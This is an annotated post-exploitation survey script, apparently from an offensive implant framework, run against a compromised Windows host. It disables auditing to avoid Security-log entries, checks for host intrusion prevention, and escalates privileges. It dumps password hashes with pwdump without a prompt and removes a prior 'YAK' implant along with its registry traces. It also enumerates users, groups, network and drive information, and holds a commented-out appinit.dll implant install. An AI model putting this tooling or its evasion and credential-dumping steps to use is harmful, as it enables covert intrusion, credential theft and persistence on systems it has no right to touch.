
#####################################################
#20041029 - reworked for EP3 from old scripts, new changelog started
#####################################################
# Simple3.eps - first-pass survey of a newly accessed Windows target.
# In order it: records a SIMPLE=FALSE marker, locates the scripts directory,
# tries to disable auditing, logs the process list, checks/elevates
# privileges, fingerprints the OS, sweeps for a prior "YAK" install, then
# gathers machine/network/drive/registry information and frees the plugins
# it loaded. Sub-scripts are invoked by bare name and are expected to live
# in $ScriptsDir.
# Environment Variable to indicate whether Simple has finished.
# Set FALSE here and flipped to TRUE only at the very end, so an early
# `return false` (e.g. declining elevation) leaves it FALSE for callers.
`lpsetenv -option SIMPLE -value FALSE`;
#####################################################
# Learn From the Past: Don't repeat old errors
#####################################################
#ifnot (prompt `script LearnFromThePast.eps`){
# echo "";
# echo "moving on then....";
# echo "";
#}
# Resolve the scripts directory. `@record on/off` brackets commands whose
# output is read back with GetCmdData (pattern used throughout this file).
# If `getdirectory -scripts` fails we fall back to a hard-coded E: path,
# which assumes a specific operator-side layout -- verify before relying
# on the fallback, since $ScriptsDir is later used to build a local
# command line (installdate.pl).
@echo off;
@record on;
string $ScriptsDir;
if(`getdirectory -scripts`) {
string $Dir = GetCmdData("dir");
$ScriptsDir = $Dir[0];
}else{
$ScriptsDir="E:\\resources\\ep\\scripts";
}
@record off;
# Default to "no YAK present"; the YAK section below sets ON if verify finds it.
`lpsetenv -option YAK -value OFF`;
@echo on;
#####################################################
# Audit Section
#####################################################
# $auditOff mirrors the success/failure of disableauditing.eps. It is the
# OPSEC gate for the services/users/groups enumeration later in this
# script (those queries are only run when auditing was actually disabled).
bool $auditOff = false;
if(`script disableauditing.eps`){
$auditOff = true;
}else{
$auditOff = false;
}
pause;
#####################################################
# Check Process List for Cisco Security Agent
#####################################################
# Logged early so the operator can spot a host-based IPS (Cisco Security
# Agent) before anything noisier is run. Nothing here parses the log; the
# pause exists so the operator reads it.
`log processlist`;
pause;
#####################################################
# Elevation Section
#####################################################
# Determine whether the current process already runs as SYSTEM.
# $sys   - true when whoami reports user "system" (exact string compare;
#          whether it is case-sensitive depends on the interpreter -- TODO confirm)
# $pCheck - set true by the next block once the processcheck plugin has
#          been used, so the cleanup section knows to free it.
# NOTE: the env option name "privleges" is misspelled in the original; it is
# deliberately left as-is because other scripts may read that exact key.
@record on;
bool $sys = false;
bool $pCheck = false;
if (`whoami`){
string $sUser;
$sUser= GetCmdData("user");
`lpsetenv -option privleges -value "$sUser"`;
if ($sUser == "system") {
$sys = true;
}
}
@record off;
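ifnot ($sys == true) {
    # Not SYSTEM: check whether we are at least a local Administrator and,
    # if not, offer to elevate via get_admin.
    echo "Checking our current privileges...";
    @record on;
    bool $elevate_me = true;
    string $sSys;
    string $sAdmin;
    # Resolve the target's SIDs for the Administrators group and SYSTEM.
    echo "Get the targets name for administrator and system";
    if (`wellknownid -name administrators`){
        $sAdmin = GetCmdData("sid");
    }
    if (`wellknownid -name system`){
        $sSys = GetCmdData("sid");
    }
    echo "Let's see if we have enough rights to move on";
    # processcheck is used from here on; $pCheck tells the cleanup section
    # at the end of the script to free it.
    $pCheck = true;
    if (`processcheck -user $sSys`) {
        $elevate_me = false;
        echo "";
        echo "You are system! Moving on...";
        echo "";
    }
    else if (`processcheck -group $sAdmin`) {
        $elevate_me = false;
        echo "";
        echo "You have Administrator rights! Moving on...";
        echo "";
    }
    @record off;
    ifnot ($elevate_me == false) {
        echo "";
        echo "Rut Roh! we're not the Admin or System...";
        echo "";
        # Declining aborts the whole script; the SIMPLE env marker stays FALSE.
        ifnot (prompt "Grant local Administrator rights to current process?") {
            echo "I'm guessing you have a reason for not elevating";
            return false;
        }
        @record on;
        bool $nt4a = true;
        if (`systemversion`) {
            int $major = GetCmdData("sysVerMajor");
            if ($major != 4) {
                $nt4a = false;
            }
        }
        # NT4 Terminal Server is flagged as non-elevatable. This only warns
        # and pauses; get_admin is still attempted below (original behaviour
        # preserved -- the operator can abort at the pause).
        if ($nt4a == true){
            if (prompt "Is this an NT4 terminal server?") {
                echo "Unable to elevate privileges on NT4 Terminal Server";
                pause;
            }
        }
        @record off;
        # FIX: the "rights have been granted" messages previously sat inside
        # the failure branch, so a failed get_admin printed both the failure
        # and the success text, and a successful get_admin printed nothing.
        # Success text now lives in the else branch. A failure is still not
        # fatal: the survey continues with whatever rights we have.
        ifnot (`get_admin`) {
            echo "Failed to grant Administrator rights to your privilege";
            pause;
        }else{
            echo "";
            echo "Administrator rights have been granted to your process";
            echo "Close the \"get_admin\" channel when you no longer wish to have these rights";
            echo "";
            pause;
        }
    }
}
else {
    echo "";
    echo "Ok, system...Moving on...";
    echo "";
    pause;
}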
#####################################################
# Registry Check for Win2k SP4
#####################################################
# Dump HKLM\software\microsoft\windows nt\currentversion and hand one of
# its values to the operator-side installdate.pl.
# CAVEATS (review):
#  - $regValues[1] is chosen by position in value_data, so this depends on
#    the target's value ordering; confirm which value that index holds
#    before trusting the installdate output.
#  - That value is target-controlled and is interpolated unquoted into a
#    `local run -command` string executed on the operator's own machine.
#    If `local run` hands the string to a shell, a crafted registry value
#    could execute commands on the operator side. Quote/validate it --
#    TODO confirm how `local run` tokenises its command string.
@record on;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion"`;
string $regValues;
$regValues=GetCmdData("value_data");
`local run -command "perl $ScriptsDir/../../../tools/installdate.pl $regValues[1]" -redirect installdate`;
@record off;
# Hotfix enumeration runs in the background while the OS flags are computed.
`background script hotfixes.eps`;
# OS flags consumed by later sections:
#   $nt4 - major version == 4 (NT 4.0); selects the NT4 command path below
#   $sp  - non-NT4 with service-pack major == 4 (the "Win2k SP4" test);
#          also exported as env ServicePack=SP4
#   $dc  - sysProduct == 2; used below to gate the (disabled) AD checks and
#          the adgc/admode/aduser frees, so presumably "domain controller"
#   $xp  - declared here but never assigned anywhere in this script, so it is
#          always false and the `$xp == false` branch below always runs.
#          $minor is read but unused (likely meant for the XP test).
@record on;
bool $nt4 = true;
bool $xp = false;
bool $dc = false;
bool $sp = false;
if (`systemversion`) {
int $major = GetCmdData("sysVerMajor");
int $spmajor = GetCmdData("sysSPMajor");
int $minor = GetCmdData("sysVerMinor");
int $product = GetCmdData("sysProduct");
if ($major != 4) {
$nt4 = false;
}
#Added to Test for SP 4 on Win2k
if ($nt4 == false){
if ($spmajor == 4) {
$sp = true;
`lpsetenv -option ServicePack -value "SP4"`;
}
}
if ($product == 2){
$dc = true;
}
}
@record off;
#####################################################
# Monitors Section
#####################################################
`script startmonitors.eps`;
# processdeep.eps is optional but recommended (per the prompt text); it is
# backgrounded so the rest of the survey continues while it runs.
if (prompt "Run process info? *You should run normally run it*") {
`background script processdeep.eps`;
}
### moved to top of simple to check for Cisco Security Agent
#`log processlist`;
#pause;
#####################################################
# Nethide Section
#####################################################
# Export the target-side address/port for a later (manual) nethide run.
# getnetaddr's "remote_*" fields are stored under the local* env names:
# "remote" appears to be relative to the operator end of the connection,
# i.e. the target's own address/port -- TODO confirm against getnetaddr's
# field semantics before reusing localIP/localPORT elsewhere.
@record on;
`getnetaddr`;
int $local_port = GetCmdData("remote_port");
string $remote_address = GetCmdData("remote_address");
@record off;
`lpsetenv -option localIP -value $remote_address`;
`lpsetenv -option localPORT -value $local_port`;
# Automated nethide is disabled; the port is still exported above so the
# operator can run nethide3.eps by hand with the same value.
#`script nethide3.eps $local_port`;
echo "automated nethide has been temporarily disabled";
#####################################################
# IDS Detection Section
#####################################################
#if (prompt "Run the ids logger?"){
# `script idslogger.eps`;
#}
#####################################################
# Checking For YAK
#####################################################
# Detect a prior "YAK" install on the target and, with operator consent,
# collect from it, uninstall it, re-verify, and then scrub its
# legacy_kbpnp service key out of CurrentControlSet and every ControlSet00N.
# The YAK env option is set ON as soon as verify finds it and is only set
# back to OFF when a post-uninstall verify comes back clean; declining the
# uninstall or a failed uninstall therefore leaves it ON.
# $success is declared but never used anywhere in this script.
bool $success;
@echo off;
echo "#####################################################";
echo "# Checking For YAK";
echo "#####################################################";
if (`yak verify`){
`lpsetenv -option YAK -value ON`;
echo " YAK FOUND ON TARGET!!";
echo "MUST UNINSTALL UNLESS OTHERWISE INSTRUCTED BY HIGHER POWER! ";
if(prompt "Uninstall YAK?"){
# What `yak collect` retrieves is not visible here; it runs before the
# uninstall so whatever it gathers is not lost.
`yak collect`;
ifnot(`yak uninstall`){
echo "Uninstall Unsuccessful! WHY?";
echo "GO GET HELP!";
}else{
ifnot(`yak verify`){
echo "YAK Uninstalled! You May move on.";
`lpsetenv -option YAK -value OFF`;
}else{
echo "YAK NOT Uninstalled IEEEEEEE!";
echo "GO GET HELP!";
}
}
}
}
#check for the registry key of interest.
# Registry cleanup runs whether or not the YAK binary was found, since the
# service key can outlive the install. Each delete is re-queried to confirm.
echo "\nChecking for YAK registry keys";
@echo on;
if (`regquery -hive L -subkey "system\\currentcontrolset\\enum\\root\\legacy_kbpnp"`) {
#registry key is still there
echo "Found YAK's registry key: HKLM\\system\\currentcontrolset\\enum\\root\\legacy_kbpnp";
if (prompt "YAK's registry key still there, would you like to remove it?") {
`regdelkey -hive L -key "system\\currentcontrolset\\enum\\root\\legacy_kbpnp" -recursive`;
#check one more time
if (`regquery -hive L -subkey "system\\currentcontrolset\\enum\\root\\legacy_kbpnp"`) {
echo "UNABLE TO REMOVE THE REGISTRY KEY. FIND HELP";
}
}
} else { echo "\n** No YAK registry key in CurrentControlSet. **\n";}
#find how many controlSet's there are
# Walks controlset001, controlset002, ... until one does not exist. Because
# the key name is built as "controlset00$controlNums", only single-digit
# sets (001-009) are ever examined; a tenth would be looked up as
# "controlset0010" and stop the loop.
# Note `@echo off` is issued each iteration and only turned back on when
# the control set exists, so echo stays off from the last (missing) set
# until the `@echo on` after the loop.
int $controlNums = 0;
echo "\nChecking all other control Sets\n";
bool $keepGoing = true;
while ($keepGoing) {
$controlNums++;
@echo off;
if (`regquery -hive L -subkey "system\\controlset00$controlNums"`) {
@echo on;
if (`regquery -hive L -subkey "system\\controlset00$controlNums\\enum\\root\\legacy_kbpnp"`) {
if (prompt "Delete out of controlset00$controlNums ?") {
`regdelkey -hive L -key "system\\controlset00$controlNums\\enum\\root\\legacy_kbpnp" -recursive`;
#check one more time
if (`regquery -hive L -subkey "system\\controlset00$controlNums\\enum\\root\\legacy_kbpnp"`) {
echo "UNABLE TO REMOVE THE REGISTRY KEY. FIND HELP";
}
}
} else { echo "\n** No YAK registry key in controlset00$controlNums. **\n\n";}
} else { $keepGoing = false; }
}
echo "\n*** YAK Registry Cleanup complete***\n";
pause;
@echo on;
#####################################################
# Machine/network Info Section
#####################################################
# When we started as SYSTEM the elevation block above was skipped, so the
# well-known SIDs have not been resolved yet; do it here (local lookup).
if ($sys== true) {
echo "getting the well known Id's now..";
`wellknownid -name administrators -local`;
`wellknownid -name system -local`;
}
`script syspath.eps`;
`background script drivercheck.eps`;
`language`;
`remotelocaltime`;
`background netmap`;
`netbios -local`;
# route2k first; fall back to the older `route` plugin if it fails (NT4).
ifnot (`route2k -print`) {
`route`;
}
`arp -print`;
#echo "not running arp at the moment";
#if ( prompt "Run script arp.eps" ){
# `script arp.eps`;
# }
# else { echo "No arp for you!"; }
# pwdump is launched unconditionally in the background; its return value is
# what gets passed to prompt, so this does NOT ask before dumping hashes.
# Same idiom as the commented-out LearnFromThePast call at the top -- what
# prompt does with a boolean argument is not visible here; TODO confirm,
# and consider `if (prompt "Run pwdump?")` if an explicit ask was intended.
ifnot (prompt `background pwdump`) {
pause;
}
if ($nt4 == false){
`ipconfig`;
echo "not running portmap or fport right now";
# if ( prompt "Run portmap -maxports 750 -handlememory 2048000?" ){
# ifnot (`portmap -maxports 750 -handlememory 2048000`) {
# echo "Portmap failed!";
# if (prompt "Do you want to run FPORT?") {
# `script fport.eps`;
# }
# }
# }
# $xp is never set true in this script, so this branch is always entered.
if ($xp == false){
if ($dc == true)
{
#if (prompt "Run ADGC, ADMODE, ADUSER? ** Generally say no to this, unless you have really good reason to!" ){
# echo "OK, I assume you know what you are doing...";
# `background adgc -all`;
# `admode`;
# `background aduser -all`;
#}
echo "the automated adgc check has been temp disabled .. if needed run manually";
}
}
} else {
####################
# Commands for NT 4#
####################
# NT4 has no ipconfig plugin path here: this spawns ipconfig.exe on the
# target (a new process, visible to process monitoring), hence the prompt.
if (prompt "do you want to run ipconfig on the target?") {
`run -command "ipconfig.exe /all" -redirect ipconfig`;
}
echo "not running portmap or fport right now";
# if ( prompt "Run portmap -maxports 750 -handlememory 2048000?" ){
# ifnot (`portmap -maxports 750 -handlememory 2048000`) {
# echo "Portmap failed!";
# if (prompt "Do you want to run FPORT?") {
# `script fport.eps`;
# }
# }
# }
}
pause;
ifnot (`script scheduler.eps`) {
pause;
}
`memory`;
################################################################
# drive info
################################################################
# Enumerate drives and report free space on fixed disks only. The per-drive
# type arrays are indexed in parallel with $drive_letters. Only
# $is_unknown (commented-out echo) and $is_fixed are actually consulted;
# the removable/remote/cdrom/ramdisk/noroot arrays are read but unused.
bool $ok;
int $i = 0;
@record on;
# The command name goes through a string so the same call shape could be
# reused; it is always "listdrives" here.
string $cmd = "listdrives";
$ok = `$cmd`;
@record off;
if ( $ok ) {
string $drive_letters = GetCmdData("drive");
bool $is_unknown = GetCmdData("is_drive_unknown");
bool $is_noroot = GetCmdData("is_drive_noroot");
bool $is_removable = GetCmdData("is_drive_removable");
bool $is_fixed = GetCmdData("is_drive_fixed");
bool $is_remote = GetCmdData("is_drive_remote");
bool $is_cdrom = GetCmdData("is_drive_cdrom");
bool $is_ramdisk = GetCmdData("is_drive_ramdisk");
$i = 0;
while ($i < sizeof($drive_letters)) {
string $current_drive = $drive_letters[$i];
if ( $is_unknown[$i] == true ) {
# echo "Unknown drive: $current_drive ";
}
if ( $is_fixed[$i] == true ) {
`diskspace $current_drive `;
}
$i++;
}
} else {
echo "unable to enumerate drives";
}
# Operator reminder: free space and memory feed the "can we install a
# level 4" decision; nothing here checks a threshold automatically.
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "If this is a new box, check the system drive free space";
echo "to be sure you have enough free space to install a L4.";
echo "Also take note of the memory usage.";
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
pause;
#####################################################
# User Info Section
#####################################################
# OPSEC gate: services/users/groups enumeration is offered only when
# disableauditing.eps succeeded ($auditOff). Otherwise it is skipped
# outright, on the stated grounds that these queries would be logged as
# object-access events in the Security log. Note the gate is the script's
# return value, not a fresh check of the audit policy.
if ($auditOff){
if (prompt "Do you want the target services,users,and groups? *** Only run if auditing disabled *** "){
`background services -local`;
`background users -local`;
`background groups -local`;
`background groups -global`;
}
}else{
echo "Auditing was not disabled. Not getting the target services, users, and groups.";
echo "These commands would likely get logged as Object Accesses in the Security Log.";
}
#####################################################
# Registry Section
#####################################################
# TODO: log currentversion\\windows, background the rest
# (make parse.ep.pl parse them out of the regquery files)
# Read-only queries, run in the foreground, covering: the power Heuristics
# value, Winlogon and Windows under "Windows NT\CurrentVersion" (the latter
# is presumably of interest for the AppInit-based level 4 install sketched
# in the commented section below -- not verified here), the Run/RunOnce/
# RunOnceEx autostart keys, and the CPU description tree.
`regquery -hive L -subkey "SYSTEM\\currentcontrolset\\control\\session manager\\power" -value Heuristics`;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion\\winlogon"`;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion\\windows"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\run"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\runonce"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\runonceex"`;
`regquery -hive L -subkey "hardware\\description\\system\\centralprocessor" -recursive`;
#####################################################
# Level 4 Section
#####################################################
#if (prompt "Do we need to install a level 4 or upgrade an existing implant?") {
# if (prompt "Do you want to do a Level 4 install?") {
### `level4install -local psxssdll.dl_ -remote appinit.dll -match systray.exe`;
### `free level4`;
# ifnot(`install`) {
# echo "Error in installation!!!";
# pause;
# } else { `script nethide3.eps 1154`; }
#
# }
# else {
# ifnot(`upgrade`) {
# echo "Error in upgrade!!!";
# pause;
# } else { `script nethide3.eps 1154`; }
# }
#}
#####################################################
# Clean up plugins
#####################################################
#if (prompt "Do you want to free up the commonly unused plugins?"){
# Unload plugins this script loaded. Conditional frees track the branches
# above: ipconfig is only a plugin on non-NT4 (the NT4 path used `run`),
# processcheck only if the elevation block reached it ($pCheck).
# NOTE: adgc/admode/aduser are freed on a DC even though their invocations
# are commented out earlier in this script, so they were never loaded by
# Simple3 -- whether `free` on an unloaded plugin is harmless or errors is
# not visible here; TODO confirm, or drop these three frees.
if ($nt4 == false){
if ($dc == true){
`free adgc`;
`free admode`;
`free aduser`;
}
`free ipconfig`;
}
`free pwdump`;
`free wellknownid`;
if ($pCheck){
`free processcheck`;
}
`free language`;
`free systemversion`;
`free remotelocaltime`;
`free scheduler`;
`free regquery`;
`free memory`;
`free services`;
`free users`;
`free groups`;
`free listdrives`;
`free diskspace`;
#}
#####################################################
# Document Section
#####################################################
#if (prompt"Do you want to run docsurvey.eps?"){
# `script docsurvey.eps`;
#}
# Environment Variable to indicate whether Simple has finished.
# This is the only place SIMPLE becomes TRUE; every early exit above leaves
# the FALSE set at the top of the script in place.
`lpsetenv -option SIMPLE -value TRUE`;
# Final state for the operator: anything still listed here (e.g. a
# get_admin channel, background jobs) is something the cleanup above did
# not release.
`plugins`;
`channels`;
#####################################################
# End Script
#####################################################
return true;